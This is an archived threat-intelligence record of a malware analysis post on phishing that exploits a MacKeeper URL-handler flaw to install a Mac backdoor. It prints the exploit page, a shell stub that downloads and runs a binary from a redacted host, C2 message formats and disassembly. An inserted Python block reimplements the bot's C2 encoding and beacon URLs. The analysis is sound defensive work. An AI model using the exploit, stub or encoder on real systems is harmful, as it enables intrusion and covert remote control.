{
	"id": "540f9115-a80e-4f1a-8730-3976e0737493",
	"created_at": "2026-04-06T00:10:19.724463Z",
	"updated_at": "2026-04-10T03:20:56.636491Z",
	"deleted_at": null,
	"sha1_hash": "71f4e787e19e4ea6ab27d47d0291f091266be7ce",
	"title": "New Mac OS Malware Exploits MacKeeper",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 128495,
	"plain_text": "New Mac OS Malware Exploits MacKeeper\r\nArchived: 2026-04-05 23:01:03 UTC\r\nWritten by Sergei Shevchenko, Cyber Research\r\nLast month a new advisory was published on a vulnerability discovered in MacKeeper, a controversial piece of software\r\ncreated by the Ukrainian company ZeoBIT and now owned by Kromtech Alliance Corp.\r\nAs discovered by Braden Thomas, the flaw in MacKeeper's custom URL handler allows arbitrary remote\r\ncode execution when a user visits a specially crafted webpage.\r\nThe first reports on this vulnerability suggested that no malicious MacKeeper URLs had been spotted in the wild\r\nyet. Well, not anymore.\r\nSince the proof-of-concept was published, it took just days for the first instances to be seen in the wild.\r\nThe attack this post discusses is carried out via a phishing email that contains a malicious URL.\r\nOnce the link is clicked, a user running MacKeeper is presented with a dialog claiming the machine is infected with\r\nmalware and prompting for a password to remove it. 
The real purpose of the prompt is to obtain the user's password so that the malware can be\r\nexecuted with administrator rights.\r\nThe webpage hosted by the attackers in this particular case has the following format:\r\n\u003c!doctype html\u003e\r\n\u003chtml\u003e\r\n\u003cbody\u003e\r\n \u003cscript\u003e\r\n window.location.href=\r\n  'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:\r\n  arguments:/[BASE_64_ENCODED_STUB]';\r\n \u003c/script\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\r\nwhere [BASE_64_ENCODED_STUB], once decoded, contains the following commands, which MacKeeper's helper\r\ninterprets and executes using the system shell:\r\ncurl -A 'Safari' -o /Users/Shared/dufh http://[removed]/123/test/qapucin/bieber/210410/cormac.mcr;\r\nchmod 755 /Users/Shared/dufh;\r\ncd /Users/Shared;\r\n./dufh\r\nhttps://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html\r\nPage 1 of 7\n\nThe launcher path for this command is specified within the [BASE_64_ENCODED_STUB] as \"/bin/sh\" (the system's\r\nPOSIX shell), and the prompt message displayed to the user is:\r\n\"Your computer has malware that needs to be removed\"\r\nAs a result, once the unsuspecting user clicks the malicious link, the following dialog box pops up (the screenshot is not\r\nreproduced in this text version):\r\nOnce the password is entered, the malware is downloaded, saved as /Users/Shared/dufh, and executed.\r\nAt this stage, the executable file dufh is a dropper. When run, it writes out an embedded executable and then\r\nlaunches it. 
The dropper also creates a property list in LaunchAgents so that the dropped executable starts automatically\r\nat login (the plist sets \"\u003ckey\u003eRunAtLoad\u003c/key\u003e\").\r\nBackdoor functionality\r\nThe embedded executable is a bot that gives the attackers remote access.\r\nIt can perform the following actions:\r\n    •    Open a pipe stream and execute shell commands\r\n    •    Upload files to the C\u0026C server\r\n    •    Download files from the C\u0026C server\r\n    •    Set execution permissions and run downloaded files\r\nThe bot collects system information such as:\r\n    •    List of all processes and their status\r\n    •    Operating system name and version\r\n    •    User name\r\n    •    Availability of any VPN connections\r\nConfiguration\r\nThe bot keeps its execution parameters in a configuration (config) section. The embedded config parameters are\r\nencoded with the 11-byte XOR key:\r\n7D5A25254B12191F7E6415\r\nThe bot parses and distinguishes a number of configuration parameters. 
Below is the list of the config parameters\r\nalong with their default values (parameter name, then default value):\r\nFILE_NAME          FileName\r\nPATHTOSAVE         PathToSave\r\nSHELL              Shell\r\nSTART_BLOCK_FILE   [file]\r\nBLOCK_EXECUTE      Execute\r\nBLOCK_DELETE       Delete\r\nEND_BLOCK_FILE     [/file]\r\nSERVERS            [removed]\r\nMAC                mac\r\nCONFIG             config\r\nGET_CONFIG         1\r\nFILES              file\r\nLOG                log\r\nOLD_CONFIG         2\r\nID                 id\r\nTOKEN              h8sn3vq6kl\r\nEXTENSIONS         .xml, .pdf, .htm, .zip\r\nThe block of files specified between the START_BLOCK_FILE and END_BLOCK_FILE tags will be\r\ndownloaded/executed.\r\nThe config parameters FILES, LOG, ID, CONFIG, OLD_CONFIG and MAC are used to construct a 'message' that\r\nis encrypted and submitted to the server.\r\nFor example, to upload system info in a so-called 'hello' message, the bot constructs a message that looks like:\r\nid=[BOT_ID]\u0026mac=[SYSTEM_INFO]\r\nTo upload a log file (the result of executing a designated command or a downloaded file), the data uploaded by\r\nthe bot is wrapped in the 'message' below:\r\nid=[BOT_ID]\u0026log=[LOG_DATA]\r\nA new config request 'message' looks like:\r\nid=[BOT_ID]\u0026config=1\r\nThe SERVERS parameter contains an updated list of C\u0026C servers.\r\nThe config parameters TOKEN and EXTENSIONS are used to randomise URL parameters, as demonstrated below.\r\nNetwork Communications\r\nThe bot checks whether it is connected to the Internet by fetching http://www.google.com. If not, it\r\nkeeps checking in a loop until the computer goes online.\r\nThe data transferred over the network is encrypted with a random 4-byte XOR key. 
The key is generated with\r\na Mersenne Twister pseudo-random number generator (a statistical PRNG, not a cryptographic one; with a repeating 4-byte XOR the scheme is\r\nobfuscation rather than real encryption, as the worked decryption below shows).\r\nThe bot then constructs a blob that consists of 3 parts:\r\n    •    the 4-byte XOR key (stored in encoded form, see the note below)\r\n    •    a 2-byte CRC16 checksum, used as a data integrity check\r\n    •    the encrypted data\r\nNOTE: The XOR key used to encrypt the data is saved into the blob in an encoded form, XORed with the hard-coded\r\nvalue 0x0E150722:\r\n__text:0000000100005684    call   __ZN9Generator13getRandomNumbEmm\r\n__text:0000000100005689    mov    [rbp+random_Number], rax\r\n__text:000000010000568D    mov    rax, [rbp+random_Number]\r\n__text:0000000100005691    xor    rax, 0E150722h\r\n__text:0000000100005697    mov    [rbp+random_Number_xor_0E150722], rax\r\nThe constructed blob is then base64-encoded and sent in the body of a POST request with the content type\r\n\"application/x-www-form-urlencoded\".\r\nTo decrypt the data returned from the server, the bot first base64-decodes it, extracts the encoded key from the first 4\r\nbytes and XORs it with 0x0E150722 to obtain the original XOR key. The original key is then used to\r\ndecrypt the data one byte at a time, cycling through the four key bytes:\r\n__text:00000001000058A9  call  __Znam ; operator new[](ulong)  ; allocate buffer\r\n__text:00000001000058AE  mov   [rbp+decoded_data], rax         ; for decoded data\r\n__text:00000001000058B2  mov   [rbp+index], 0            ; initialise index\r\n__text:00000001000058BA loop:\r\n__text:00000001000058BA  mov   rax, [rbp+index]\r\n__text:00000001000058BE  cmp   rax, [rbp+size_plus_4]    ; index \u003c size + 4 ?\r\n__text:00000001000058C2  jnb   exit                      ; exit loop if done\r\n__text:00000001000058C8  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058CC  mov   rcx, [rbp+encrypted_data] ; RCX -\u003e encrypted data\r\n__text:00000001000058D0  movzx edx, byte ptr [rcx+rax+4] ; EDX -\u003e next enc. byte\r\n__text:00000001000058D5  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058D9  and   rax, 3                    ; from 0 to 3\r\n__text:00000001000058DF  movzx esi, byte ptr [rbp+rax+random_XOR_key]\r\n                                                         ; ESI -\u003e next byte in key\r\n__text:00000001000058E4  xor   edx, esi                  ; XOR next encrypted byte\r\n                                                         ; with next byte in key\r\n__text:00000001000058E6  mov   dil, dl\r\n__text:00000001000058E9  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058ED  mov   rcx, [rbp+decoded_data]   ; RCX -\u003e decoded data\r\n__text:00000001000058F1  mov   [rcx+rax], dil            ; save decoded byte\r\n__text:00000001000058F5  mov   rax, [rbp+index]          ; RAX = index\r\n__text:00000001000058F9  add   rax, 1                    ; increment index\r\n__text:00000001000058FF  mov   [rbp+index], rax\r\n__text:0000000100005903  jmp   loop                      ; repeat decryption\r\nThe POST requests generated by the bot go to randomised URLs. For instance, the generated URLs\r\nmight look like:\r\nhttp://[SERVER_IP]/0OhgAH/qapfAH/YO00Aj/kZvXez/8Sbuoz.pdf/?3Y=x1XjNY1qhVXWJIcNjj4=\r\nhttp://[SERVER_IP]/uPyTA/p4xat/GzmAL/KHkSL/xHkSL.zip/?Ic=7DQFBKYLY2T9RWE8pV8=\r\nhttp://[SERVER_IP]/Rh/EWar/a1br/Pgbr.htm/?li=CBbGU0IpoDMZZ6JrQX0=\r\nhttp://[SERVER_IP]/RkwH0/zkwH0/s0KH0/1TieCO8@%C3%83%C3%98%C2%A5%E2%88%AB%C2%AF%07.xml/?I=jwj+RcU3mCWeeZp9xmM=\r\nThe 'extension' of the last path component (.xml, .pdf, .htm or .zip in the examples above)\r\nis picked by the bot from the config parameter EXTENSIONS.\r\nThe base64-encoded 'request' string in the query-string value is an encrypted copy of the config parameter TOKEN ('h8sn3vq6kl'). 
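As an added worked example (my own code, not code from the original post and not code recovered from the malware), the following Python reproduces the encoding scheme just described in both directions: it unmasks the 4-byte key with 0x0E150722, strips the CRC16 field and XOR-decrypts a POST body, does the same for the CRC-less token carried in the URL query string, and builds a beacon URL of the observed shape. The sample POST body is the hex the post walks through below for the 'hello' message (the post truncates it, so the CRC16 itself cannot be re-verified, and the CRC16 variant is not stated on the page); the sample query value is taken from the first sample URL above. The server address 203.0.113.5 and the path-segment count, lengths and character set used by make_beacon_url are assumptions made here for illustration, not observed bot behaviour.

```python
import base64
import random
import struct
from urllib.parse import urlsplit

# Hard-coded value the bot XORs the per-message random key with
# (from the disassembly: xor rax, 0E150722h).
KEY_MASK = 0x0E150722

# Defaults from the bot's config section (TOKEN and EXTENSIONS in the table above).
TOKEN = b'h8sn3vq6kl'
EXTENSIONS = ['.xml', '.pdf', '.htm', '.zip']

# Constructed sample data, copied from the post: the first 22 bytes of the
# 'hello' POST body (hex) and the query value of the first sample URL.
SAMPLE_BLOB = bytes.fromhex('E7C82476DAD4581CF8FF0148F5E95C19A6F27C19A6EF')
SAMPLE_TOKEN_PARAM = 'x1XjNY1qhVXWJIcNjj4='

# Character set for the random URL parts (an assumption of this example).
ALNUM = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'


def unmask_key(encoded_key: bytes) -> bytes:
    # The 4 stored bytes are a little-endian uint32 XORed with KEY_MASK.
    # After unmasking, the key is consumed byte by byte in memory order
    # (key[index & 3] in the decryption loop), i.e. little-endian.
    (masked,) = struct.unpack('<I', encoded_key[:4])
    return struct.pack('<I', masked ^ KEY_MASK)


def mask_key(key: bytes) -> bytes:
    # XOR with a constant is its own inverse, so masking equals unmasking.
    return unmask_key(key)


def xor_stream(data: bytes, key: bytes) -> bytes:
    # Repeating 4-byte XOR, exactly what the loop in the disassembly does.
    return bytes(b ^ key[i & 3] for i, b in enumerate(data))


def decode_blob(blob: bytes):
    # POST body layout: [4-byte masked key][2-byte CRC16][ciphertext].
    # The key stream starts at the CRC16 field, not at the ciphertext.
    key = unmask_key(blob[:4])
    body = xor_stream(blob[4:], key)
    (crc,) = struct.unpack('<H', body[:2])
    return key, crc, body[2:]


def encode_blob(key: bytes, crc: int, plaintext: bytes) -> bytes:
    # Inverse of decode_blob. The CRC16 value is passed in because the post
    # does not say which CRC16 variant the bot computes.
    body = struct.pack('<H', crc) + plaintext
    return mask_key(key) + xor_stream(body, key)


def decode_token(b64_value: str) -> bytes:
    # Query-string value layout: [4-byte masked key][ciphertext], no CRC16.
    raw = base64.b64decode(b64_value)
    return xor_stream(raw[4:], unmask_key(raw[:4]))


def encode_token(token: bytes, key: bytes) -> str:
    return base64.b64encode(mask_key(key) + xor_stream(token, key)).decode()


def token_from_url(url: str) -> bytes:
    # Take the raw value after the first '=' so base64 '+' and '=' survive
    # (a form-decoding parser would turn '+' into a space).
    query = urlsplit(url).query
    return decode_token(query.split('=', 1)[1])


def make_beacon_url(server: str, seed: int) -> str:
    # Approximation of the observed URL shape. Segment count, segment length
    # and character set are assumptions of this example, not recovered from
    # the binary; the extension list and the token encoding are from the post.
    rng = random.Random(seed)
    segs = [''.join(rng.choice(ALNUM) for _ in range(rng.randint(2, 6)))
            for _ in range(rng.randint(3, 5))]
    segs[-1] += rng.choice(EXTENSIONS)
    param = ''.join(rng.choice(ALNUM) for _ in range(rng.randint(1, 2)))
    key = struct.pack('<I', rng.getrandbits(32))
    return 'http://' + server + '/' + '/'.join(segs) + '/?' + param + '=' + encode_token(TOKEN, key)


if __name__ == '__main__':
    key, crc, text = decode_blob(SAMPLE_BLOB)
    print('key bytes', key.hex(), 'as uint32', hex(int.from_bytes(key, 'little')))
    print('crc16', hex(crc), 'plaintext', text)
    print('token', decode_token(SAMPLE_TOKEN_PARAM))
    print('beacon', make_beacon_url('203.0.113.5', 1))
```

For the sample body decode_blob returns the key bytes C5 CF 31 78 (0x7831CFC5 as a little-endian integer), the CRC16 0x1b1f and the plaintext id=0000&mac=Mac ; for the sample query value decode_token returns h8sn3vq6kl, which confirms that the query string carries the config TOKEN and that the same masked-key construction is used there. Because the key travels with every message and the mask is a constant, anyone holding a capture can decode the traffic without the binary, which is what makes this scheme easy to write a network decoder for.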
The token value is encrypted in the same fashion as the POST data: a random 4-byte XOR key encrypts the token and is itself\r\nstored encoded with the fixed XOR value 0x0E150722. The only difference is that there is no CRC16 field in the encoded chunk.\r\nThe other 'path' parts of the URL are random.\r\nThe binary data within the POST request, once base64-decoded, can look in hexadecimal form as:\r\nE7C82476 DAD4 581CF8FF0148F5E95C19A6F27C19A6EF...\r\nAs explained above, the first 4 bytes are the encoded key: E7C82476, read as a little-endian 32-bit integer, is 0x7624c8e7. Once the XOR value\r\n0x0E150722 is applied to it, the original randomly generated XOR key is obtained:\r\n0x7624c8e7 ^ 0x0E150722 = 0x7831CFC5.\r\nNext, the original XOR key (0x7831CFC5) is applied to the rest of the data in its in-memory (little-endian) byte order, i.e. the key\r\nstream is C5 CF 31 78 C5 CF 31 78 ..., starting at the CRC16 field (the loop above reads key[index \u0026 3], so the two CRC bytes consume\r\nkey bytes 0 and 1 and the data continues from key byte 2). Decrypting gives:\r\nE7C82476 1F1B 69643D30303030266D61633D4D616320...\r\nwhere 0x1b1f (stored little-endian as 1F 1B) is the CRC16 value, and the decoded data that follows it is a textual form of the collected\r\nsystem information:\r\nid=0000\u0026mac=Mac OS X - Version 10.9\r\nOperation system name - NSMACHOperating\r\nSystem User name - username\r\nUse proxy -\r\n            Process list :\r\nUSER   PID %CPU %MEM   VSZ RSS  TT STAT STARTED  TIME COMMAND\r\nusername 562 1.4 0.1 2471604 3428 s000 S+  6:41PM 0:00.04 ./dufh\r\nusername 529 0.0 0.0 2433344 1164 s000 S   6:38PM 0:00.02 -bash\r\nroot   527 0.0 0.0 2434972 1896 s000 Ss  6:38PM 0:00.03 login -pf username\r\n...\r\nConclusion\r\nIt is quite interesting to see how little time it took the attackers to weaponise a published proof-of-concept exploit.\r\nOne might wonder how the attackers know whether the targeted users are running MacKeeper.\r\nIn its press release, MacKeeper claimed that it has surpassed 20 million downloads worldwide.\r\nHence, the attackers might simply be 'spraying' their targets with phishing emails, hoping that some of them\r\nwill have MacKeeper installed, thus allowing the malware to be delivered to their computers and executed.\r\nSource: https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html"
	],
	"report_names": [
		"new-mac-os-malware-exploits-mackeeper.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434219,
	"ts_updated_at": 1775791256,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/71f4e787e19e4ea6ab27d47d0291f091266be7ce.pdf",
		"text": "https://archive.orkl.eu/71f4e787e19e4ea6ab27d47d0291f091266be7ce.txt",
		"img": "https://archive.orkl.eu/71f4e787e19e4ea6ab27d47d0291f091266be7ce.jpg"
	}
}